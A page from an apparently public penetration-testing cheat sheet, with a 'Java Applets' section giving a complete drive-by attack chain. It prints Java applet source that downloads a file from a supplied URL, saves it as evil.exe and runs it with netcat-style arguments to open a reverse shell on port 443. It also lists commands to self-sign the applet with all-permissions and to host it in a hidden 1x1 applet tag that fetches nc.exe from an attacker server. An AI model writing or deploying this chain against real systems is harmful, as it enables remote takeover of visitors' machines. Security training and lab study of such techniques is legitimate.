d4Rk's 1337 h4x0r guide
  • Introduction
  • Reconnaissance
    • Recon
    • OSINT
  • Enumeration
    • Network discovery
    • Port scanning
    • Webserver scanning
    • Exploit detection
    • Fuzzing
    • Process monitoring
  • Exploitation
    • Shells
      • Shells
      • TTY
    • Passwords
      • Hashcat
      • John the Ripper (JTR)
      • Hydra
      • Passwords & credentials
    • Web
      • SQL injection (SQLi)
      • Cross site scripting (XSS)
      • File inclusions (LFI, RFI)
      • Directory traversal
      • Cross site request forgery (CSRF)
      • XML external entity (XXE)
      • Cross origin resource sharing (CORS)
      • Server-side request forgery (SSRF)
      • Server-side template injection (SSTI)
      • Access control vulnerabilities
      • Authentication vulnerabilities
      • JWT attacks
      • File uploads
      • Host header attacks
      • Clickjacking
      • Logic flaws
      • OS command injection
      • HTTP Request smuggling
      • Insecure deserialization
      • DOM-based
      • WebSockets
      • Web cache poisoning
    • Buffer overflow
      • General
      • Linux
      • Windows
    • Misc
      • Evasion
      • SQSH
  • Privilege escalation
    • Linux
      • Overview
    • Windows
      • Overview
      • Mimikatz
      • PowerSploit
      • Juicy Potato, Rotten Potato (NG)
      • JAWS
      • Empire
      • SILENTTRINITY
  • Post exploitation
    • Loot
    • Pivoting
    • Standalone Tools
  • Services
    • TCP
      • TCP 21: FTP
      • TCP 22: SSH
      • TCP 23: Telnet
      • TCP 25, 587: SMTP
      • TCP 53: DNS
      • TCP 80, 443: HTTP(S)
      • TCP 88: Kerberos
      • TCP 110, 995: POP3(S)
      • TCP 111: rpcbind
      • TCP 135: MSRPC
      • TCP 139, 445: NetBIOS, SMB
      • TCP 143, 993: IMAP(S)
      • TCP 389, 636, 3268, 3269: LDAP
      • TCP 1433, UDP 1434: MSSQL Server
      • TCP 2049: NFS
      • TCP 3306: MySQL
      • TCP 3389: RDP
      • TCP 5985: WinRM
      • TCP 6379: Redis
      • TCP 27017: MongoDB
    • UDP
      • UDP 137, 138, TCP 139: NetBIOS
      • UDP 161: SNMP
    • Misc
      • Active Directoy
      • Apache Tomcat
      • Drupal
      • H2 Databases
      • IIS
      • IPsec
      • IRC
      • Java Applets
      • Java RMI
      • Jenkins
      • Joomla
      • Oracle
      • PHP
      • SharePoint
      • WordPress
  • File transfer
    • Overview
    • Wget
    • Pure-FTPd
    • TFTP
    • VBScript: Wget clone
  • Misc
    • Bash
    • Burp Suite
    • Crypto
    • Ebowla
    • Firefox extensions
    • Impacket
    • Memory forensics
    • Metasploit Framework (MSF)
    • MITM
    • Msfvenom
    • Pass the Hash (PTH)
    • PowerShell
    • PowerShell on Linux
    • Wireshark
    • Wordlists and dictionaries
  • Bug Bounty
    • Platforms
    • Tools
Powered by GitBook
On this page
  • Exploit
  • Compile, sign, etc.
  • Make exploit available to the target
Edit on GitHub
  1. Services
  2. Misc

Java Applets

PreviousIRCNextJava RMI

Last updated 3 years ago

Java applets were small applications written in the Java programming language, or another programming language that compiles to Java bytecode, and delivered to users in the form of Java bytecode.

--

Exploit

import java.applet.*;
import java.awt.*;
import java.io.*;
import java.net.URL;
import java.util.*; 
/** 
		*  Author: Offensive Security 
		*  This Java applet will download a file and execute it. **/ 
public class Java extends Applet {
	private Object initialized = null;

	public Object isInitialized() {
		return initialized;
	}

	public void init() {
		Process f;
		try {
			String tmpdir = System.getProperty("java.io.tmpdir") + File.separator;
			String expath = tmpdir + "evil.exe";
			String download = "";
			download = getParameter("1");
			
			if (download.length() > 0) { // URL parameter
				URL url = new URL(download);
				// Get an input stream for reading
				InputStream in = url.openStream();
				// Create a buffered input stream for efficency
				BufferedInputStream bufIn = new BufferedInputStream(in);
				File outputFile = new File(expath);
				OutputStream out = new BufferedOutputStream(new
					FileOutputStream(outputFile));
				byte[] buffer = new byte[2048];
				for (;;) {
					int nBytes = bufIn.read(buffer);
					if (nBytes <= 0) break;
					out.write(buffer, 0, nBytes);
				}
				out.flush();
				out.close();
				in.close();
			}
			f = Runtime.getRuntime().exec("cmd.exe /c " + expath + "<ip> 443 -e cmd.exe"); 
		} catch(IOException e) { 
			e.printStackTrace();
		}
		/* ended here and commented out below for bypass */ 
		catch (Exception exception) {
			exception.printStackTrace();
		}
	}
}

Compile, sign, etc.

javac -source 1.7 -target 1.7 Java.java
echo “Permissions: all-permissions” > /root/manifest.txt
jar cvf Java.jar Java.class
keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass password123

-> Fill in with bullshit

jarsigner -keystore mykeystore -storepass password123 -keypass mykeypass -signedjar SignedJava.jar Java.jar signapplet
cp Java.class SignedJava.jar /var/www/html/

Make exploit available to the target

echo '<applet width="1" height="1" id="Java Secure" code="Java.class" archive="SignedJava.jar"><param name="1" value="http://10.11.0.5:80/evil.exe"></applet>' > /var/www/html/java.html
locate nc.exe
cp /usr/share/windows-binaries/nc.exe /var/www/html/evil.exe
Wikipedia